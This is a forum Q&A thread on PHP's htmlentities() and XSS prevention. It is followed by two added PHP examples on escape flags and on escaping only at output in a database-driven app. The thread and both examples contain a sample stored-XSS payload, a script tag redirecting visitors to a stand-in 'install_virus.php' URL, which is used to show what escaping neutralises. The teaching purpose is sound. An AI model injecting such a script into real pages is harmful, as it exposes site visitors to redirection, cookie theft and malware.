Bytes IT Community

practical example where to use htmlentities

pradeepjain
100+
P: 563
Hi, I have read about htmlentities. I need to know when exactly it should be used, i.e. some real-world issues if it's not used.
Mar 19 '10 #1
3 Replies


Atli
Expert 5K+
P: 5,058
Hey.

The htmlentities function is used to make sure text can be safely printed into HTML. That is, it converts any character that might be read as part of the HTML markup, so that it will be displayed rather than parsed.

For example, the < and > characters have specific meaning in HTML. They are used as start and end delimiters for HTML tags. If you wanted to print them as a part of text (as the "less-than" and "greater-than" characters) rather than have them be parsed as a part of the HTML markup, you need to convert them into HTML entities.

HTML entities are special character sequences that represent characters, so they can be printed into the HTML without messing it up. Like the < and > characters. Their HTML entities look like: "&lt;" and "&gt;".

The htmlentities() function takes a normal string and converts any character like < and > into their respective HTML entity.
```php
<?php
// Say I wanted to print this into a navigation bar...
$navText = "Home > Category > Product";

// If I print that as it is, I risk messing up the HTML,
// because > has special meaning in HTML markup.

// However, if I do this:
$navText = htmlentities($navText);

// $navText becomes:
// - "Home &gt; Category &gt; Product"
// Which your browser will ignore while parsing the
// HTML, but will display as:
// - "Home > Category > Product"
?>
```
This is also a very important safety measure, to prevent XSS attacks. Websites that allow the public to add or edit text (like forums and comment sections) are a high-risk target for such attacks.

Consider if I were to post this as a comment on your site:
```html
<script>location.href="http://example.com/install_virus.php";</script>
```
If you printed that as-is into your page, everybody who visited it would be redirected to the URL, which could do anything from flood your visitors with ads, steal their cookies or even abuse browser vulnerabilities to install viruses.

To protect your visitors from this, you can simply run the post through htmlentities before printing it, turning it into:
```html
&lt;script&gt;location.href=&quot;http://example.com/install_virus.php&quot;;&lt;/script&gt;
```
Which the browser will print as the original text, rather than execute it as a part of the client-side code.
Mar 19 '10 #2
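The following is an added example, not code from the reply above, showing the escaping step applied to the script text from the thread plus a couple of constructed strings. It also covers the caveat a practitioner usually runs into: the flags and charset passed to htmlentities() decide whether single quotes are encoded and how invalid bytes are handled, so they are passed explicitly rather than left to the PHP-version-dependent defaults. The escapeHtml() and renderComment() helpers are my own names, not part of PHP.

```php
<?php
// Added example: escaping untrusted text before placing it into HTML.
// escapeHtml() and renderComment() are helper names chosen for this demo;
// every sample string below is constructed.

declare(strict_types=1);

// Escape a value for an HTML body or a double-quoted attribute.
// Flags and charset are explicit on purpose: before PHP 8.1 the default
// flags were ENT_COMPAT, which leaves single quotes (') untouched, and
// ENT_SUBSTITUTE replaces invalid UTF-8 sequences with U+FFFD instead of
// making htmlentities() return an empty string for the whole value.
function escapeHtml(string $text): string
{
    return htmlentities($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Build a comment box from untrusted text. Every interpolation goes through
// escapeHtml(); the attribute is double-quoted, so an encoded &quot; cannot
// terminate it.
function renderComment(string $author, string $body): string
{
    return '<div class="comment" title="' . escapeHtml($author) . '">'
         . '<p>' . escapeHtml($body) . '</p></div>';
}

// Constructed samples: the script from the thread, and ordinary text that
// happens to contain both kinds of quotes and a non-ASCII character.
$samples = [
    '<script>location.href="http://example.com/install_virus.php";</script>',
    "Bob's \"special\" <deal> for 5 €",
];

foreach ($samples as $raw) {
    echo "raw:        $raw\n";
    // ENT_COMPAT encodes < > & and double quotes, but the single quote
    // stays raw; inside a single-quoted attribute that would end the value.
    echo "ENT_COMPAT: " . htmlentities($raw, ENT_COMPAT, 'UTF-8') . "\n";
    echo "ENT_QUOTES: " . escapeHtml($raw) . "\n\n";
}

echo renderComment("Bob's 'shop'", $samples[0]), "\n";
```

Run it from the command line with `php escape_demo.php` (any file name will do). The point of the loop is the comparison between the two flag sets: for text that only contains `<` and `>` both look identical, and the difference only shows up when quotes are involved, which is exactly the case a template author tends not to test.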

pradeepjain
100+
P: 563
Okay, I got the concept well. I use a DB-driven application. Where exactly should htmlentities be used? While printing the data from the DB on the screen, right? Any other specific task where I need to use htmlentities to prevent XSS attacks?
Mar 19 '10 #3

Atli
Expert 5K+
P: 5,058
It should only be used when printing data to an HTML page. It doesn't really matter where the data is coming from; if it is going to be printed into an HTML page, it should be run through this function (or something equivalent).
Mar 19 '10 #4
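An added example, not from the thread, that lays out the "escape at output, not at input" rule from the reply above for a DB-driven application. The CommentStore class is a constructed in-memory stand-in for a database table (no real driver is involved), the comments are made up, and escapeHtml() and renderComments() are helper names chosen for this demo. The last few lines show what goes wrong when text is escaped once on the way into the store and again on the way out.

```php
<?php
// Added example: where HTML escaping belongs in a DB-driven app.
// CommentStore stands in for a database table; all data is constructed.

declare(strict_types=1);

function escapeHtml(string $text): string
{
    return htmlentities($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Storage layer: keep the text exactly as submitted. No HTML escaping here;
// the same text may later go to JSON, e-mail or a CSV export, each with its
// own encoding rules. (Parameterised SQL protects the query itself; that is
// a separate concern from HTML output.)
final class CommentStore
{
    /** @var array<int, array{author: string, body: string}> */
    private array $rows = [];

    public function save(string $author, string $body): int
    {
        $this->rows[] = ['author' => $author, 'body' => $body];
        return count($this->rows) - 1;
    }

    /** @return array<int, array{author: string, body: string}> */
    public function all(): array
    {
        return $this->rows;
    }
}

// Presentation layer: the only place HTML escaping happens, applied to every
// value regardless of whether it came from the DB, a form or a config file.
function renderComments(array $rows): string
{
    $html = "<ul class=\"comments\">\n";
    foreach ($rows as $row) {
        $html .= '  <li><b>' . escapeHtml($row['author']) . '</b>: '
               . escapeHtml($row['body']) . "</li>\n";
    }
    return $html . "</ul>\n";
}

$store = new CommentStore();
$store->save('alice', 'Use 1 < 2 && 2 > 1 in your test');
$store->save('mallory', '<script>location.href="http://example.com/install_virus.php";</script>');

// Raw text goes in, escaped text comes out at render time only.
echo renderComments($store->all());

// Common mistake: escaping on the way in *and* on the way out. A stored
// "&lt;" is escaped again to "&amp;lt;", so the page shows the literal
// characters "&lt;" instead of "<". Passing double_encode=false hides the
// symptom, but then user text that literally contains "&amp;" renders as
// "&" instead of "&amp;", so the real fix is to escape exactly once.
$storedEscaped = escapeHtml('1 < 2');
echo "double-encoded:      " . escapeHtml($storedEscaped) . "\n";
echo "double_encode=false: " . htmlentities($storedEscaped, ENT_QUOTES, 'UTF-8', false) . "\n";
```

Keeping the store free of HTML escaping is also what makes the reply's rule workable in practice: the render function can escape unconditionally, without having to know which rows were already "cleaned" by some earlier code path.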
